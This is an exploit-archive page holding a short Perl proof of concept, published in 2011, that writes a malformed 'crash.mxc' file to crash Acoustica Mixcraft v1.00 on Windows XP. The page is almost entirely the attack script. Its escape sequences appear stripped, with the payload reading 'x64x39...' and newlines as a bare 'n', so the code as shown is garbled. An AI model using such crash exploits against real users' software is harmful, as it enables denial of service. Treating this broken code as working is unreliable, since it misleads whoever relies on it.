[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Acoustica Mixcraft v1.00 Local Crash
# Published : 2011-08-09
# Author :
# Previous Title : iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash
# Next Title : Serva32 1.2.00 RC1 Multiple Vulnerabilities
#!/usr/bin/perl
print q(
########################################################
# home : http://www.D99Y.com
# Date : 9/8/2011
# Author : NassRawI
# Software Link : http://www.acoustica.com/mixcraft/
# Version : v1.00 Build 10
# Tested on : Windows XP SP2
########################################################
);
my $file= "crash.mxc";
my $junk= "x64x39x39x79x2ex63x6fx6d" x 1000 ;
open(d99y,">$file");
print d99y $junk ;
close(d99y);
print "n [ # ] Vulnerable File Created !n"